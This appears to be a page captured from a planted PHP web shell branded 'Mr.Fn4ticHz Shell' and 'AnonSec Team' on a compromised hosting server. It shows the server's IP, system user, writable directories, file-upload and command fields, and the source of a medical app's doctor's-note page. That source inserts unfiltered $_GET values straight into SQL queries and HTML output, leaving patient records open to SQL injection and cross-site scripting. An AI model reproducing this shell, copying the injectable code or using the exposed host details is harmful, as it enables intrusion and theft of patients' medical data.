Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.135.198.174
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/showpage_drnote.php
    <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
echo"<br><h4 align='right'>Doc.no : $_GET[srno]</h4>";
echo "<br><section class='content-header'><h3 align='right'><a href='edit_showpage_drnote.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]&id=$_GET[id]'><i class='fa fa-pencil-square-o' aria-hidden='true' style='font-size:20px;'></i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></h3></section>";
?>


 <?php
    $sql ="SELECT * FROM drnote WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND id='$_GET[id]'";
		$qsql = mysqli_query($con,$sql);
	while($rst = mysqli_fetch_array($qsql))
		{
		    echo "
<h3 align='center'>Doctors Note</h3>
 <table id='example2' class='table table-bordered table-hover'>
 
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Type Of Visit : </td>
<td width='50%'>$rst[TypeOfVisit]</td>
</tr>
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Patient Status  : </td>
<td width='50%'>$rst[Status_of_Patient]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Response to Treatment   : </td>
<td width='50%'>$rst[Response_to_Treatment]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Expected Outcome    : </td>
<td width='50%'>$rst[Expected_Outcome]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Risk Involved    : </td>
<td width='50%'>$rst[Risk_Involved]</td>
</tr>
<tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Nursing Instruction. : </td>
<td width='50%'>$rst[Nursing_Instruction]</td>
</tr>




<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Clinical Note   : </td>
<td width='50%'>$rst[Detail_Note]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Schedule Operative Procedure   : </td>
<td width='50%'>$rst[Schedule_Operative_procedure]</td>
</tr>
";
}
?></table>

Anon7 - 2022
AnonSec Team